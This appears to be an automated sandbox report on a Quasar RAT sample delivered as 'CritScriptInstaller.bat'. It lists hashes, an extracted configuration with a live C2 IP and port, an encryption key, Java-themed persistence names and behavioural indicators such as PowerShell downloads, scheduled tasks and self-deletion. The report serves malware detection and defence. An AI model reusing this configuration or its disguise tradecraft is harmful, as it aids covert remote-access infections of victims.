quasar | 32d2658a968790aa0039cf23fd097da860b938fb07d8d0b2f6779a71f40817b1

Analysis

max time kernel
113s
max time network
117s
platform
windows11-21h2_x64
resource
win11-20241007-de
resource tags

arch:x64arch:x86image:win11-20241007-delocale:de-deos:windows11-21h2-x64systemwindows
submitted
23-11-2024 17:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CritScriptInstaller.bat
Size

6KB
MD5

a3ea9257f9f074a20df56d8978be9e77
SHA1

68d029092c7a591aac215e25269329c3c3859436
SHA256

32d2658a968790aa0039cf23fd097da860b938fb07d8d0b2f6779a71f40817b1
SHA512

a61143e0680eb03fbf625da8a58aa338e88f0e12c65a3c07b2c10eead02e7a753d64e3d4271c34b04941ef772d3e772f28b53355b1a46ce4fc6aafff164c3b46
SSDEEP

192:k+6tCGPbseHYtPpUaYIKopCA8KyiXn2rCxHF:kviPpUaYIKor2i

Score

10^/10

quasar ddns discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

DDNS

193.161.193.99:32471

Mutex

807f3187-d087-4fff-beff-e73293a32af8

Attributes

encryption_key
81A0C14D4C705B3C678E573C849DE7F6A3671A8B
install_name
jusched.exe
log_directory
CachedLogs
reconnect_delay
3000
startup_key
Java Update Scheduler
subdirectory
Java

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\CritScript.exe	family_quasar
C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE	family_quasar
behavioral1/memory/2412-106-0x0000000000510000-0x0000000000834000-memory.dmp	family_quasar

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

2 5056 powershell.exe
4 4904 powershell.exe
5 4952 powershell.exe
6 2720 powershell.exe

flow	pid	process
2	5056	powershell.exe
4	4904	powershell.exe
5	4952	powershell.exe
6	2720	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
5056	powershell.exe
4904	powershell.exe
4952	powershell.exe
2720	powershell.exe
4844	powershell.exe
2972	powershell.exe
324	powershell.exe
1816	powershell.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1816 powershell.exe
Executes dropped EXE 4 IoCs

Processes:

CritScript.exeJUSCHED.EXEjusched.exeJUSCHED.EXE

pid process

4888 CritScript.exe
2412 JUSCHED.EXE
4012 jusched.exe
4944 JUSCHED.EXE

pid	process
1816	powershell.exe

pid	process
4888	CritScript.exe
2412	JUSCHED.EXE
4012	jusched.exe
4944	JUSCHED.EXE

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

unregmp2.exewmplayer.exe

description	ioc	process
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\L:	wmplayer.exe
File opened (read-only)	\??\P:	wmplayer.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\I:	wmplayer.exe
File opened (read-only)	\??\O:	wmplayer.exe
File opened (read-only)	\??\S:	wmplayer.exe
File opened (read-only)	\??\U:	wmplayer.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\N:	wmplayer.exe
File opened (read-only)	\??\R:	wmplayer.exe
File opened (read-only)	\??\V:	wmplayer.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\N:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\H:	wmplayer.exe
File opened (read-only)	\??\K:	wmplayer.exe
File opened (read-only)	\??\Z:	wmplayer.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\B:	wmplayer.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\J:	wmplayer.exe
File opened (read-only)	\??\T:	wmplayer.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\M:	wmplayer.exe
File opened (read-only)	\??\Y:	wmplayer.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\E:	wmplayer.exe
File opened (read-only)	\??\W:	wmplayer.exe
File opened (read-only)	\??\X:	wmplayer.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\A:	wmplayer.exe
File opened (read-only)	\??\G:	wmplayer.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\Q:	wmplayer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
2 raw.githubusercontent.com
4 raw.githubusercontent.com
5 raw.githubusercontent.com
6 raw.githubusercontent.com

flow	ioc
1	raw.githubusercontent.com
2	raw.githubusercontent.com
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Drops file in Windows directory 3 IoCs

Processes:

svchost.exechrome.exe

description	ioc	process
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll	svchost.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2148 3680 WerFault.exe wmplayer.exe

pid	pid_target	process	target process
2148	3680	WerFault.exe	wmplayer.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

CritScript.exeAcroRd32.exewmplayer.exeunregmp2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CritScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmplayer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	unregmp2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3860 timeout.exe
2536 timeout.exe

pid	process
3860	timeout.exe
2536	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768570816088224"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

Processes:

OpenWith.exeOpenWith.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\NodeSlot = "4"	OpenWith.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\AHK_auto_file\shell\play\ = "&Play"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Applications\chrome.exe\shell\open\command\ = "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" \"%1\""	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\AHK_auto_file\shell\play\command	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Applications\chrome.exe\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\AHK_auto_file\shell\ = "Play"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\NodeSlot = "3"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\.AHK\ = "AHK_auto_file"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\AHK_auto_file\shell	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\ise飓䁼戀蠀䀀	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\ise飓䁼戀蠀䀀\ = "AHK_auto_file"	OpenWith.exe
Key created	\Registry\User\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\NotificationData	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 540031000000000047594f6310004368726f6d6500003e0009000400efbe47594d6347594f632e00000078a502000000010000000000000000000000000000008c0714004300680072006f006d006500000016000000	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Applications	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Applications\chrome.exe\shell\open	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\AHK_auto_file\shell\play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9991"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	OpenWith.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

3184 schtasks.exe
4788 schtasks.exe

pid	process
3184	schtasks.exe
4788	schtasks.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exechrome.exe

pid	process
5056	powershell.exe
5056	powershell.exe
4844	powershell.exe
4844	powershell.exe
2972	powershell.exe
2972	powershell.exe
324	powershell.exe
324	powershell.exe
4904	powershell.exe
4904	powershell.exe
4952	powershell.exe
4952	powershell.exe
2720	powershell.exe
2720	powershell.exe
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe
3044	chrome.exe
3044	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exe

pid process

2072 OpenWith.exe
3440 OpenWith.exe
3104 OpenWith.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

3044 chrome.exe
3044 chrome.exe
3044 chrome.exe
3044 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeJUSCHED.EXEjusched.exeJUSCHED.EXEpowershell.exewmplayer.exeunregmp2.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	324	powershell.exe
Token: SeDebugPrivilege	4904	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	2412	JUSCHED.EXE
Token: SeDebugPrivilege	4012	jusched.exe
Token: SeDebugPrivilege	4944	JUSCHED.EXE
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeShutdownPrivilege	3680	wmplayer.exe
Token: SeCreatePagefilePrivilege	3680	wmplayer.exe
Token: SeShutdownPrivilege	4616	unregmp2.exe
Token: SeCreatePagefilePrivilege	4616	unregmp2.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

Processes:

wmplayer.exechrome.exe

pid	process
3680	wmplayer.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

chrome.exe

pid	process
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

OpenWith.exejusched.exeAcroRd32.exeOpenWith.exe

pid	process
2072	OpenWith.exe
4012	jusched.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
2072	OpenWith.exe
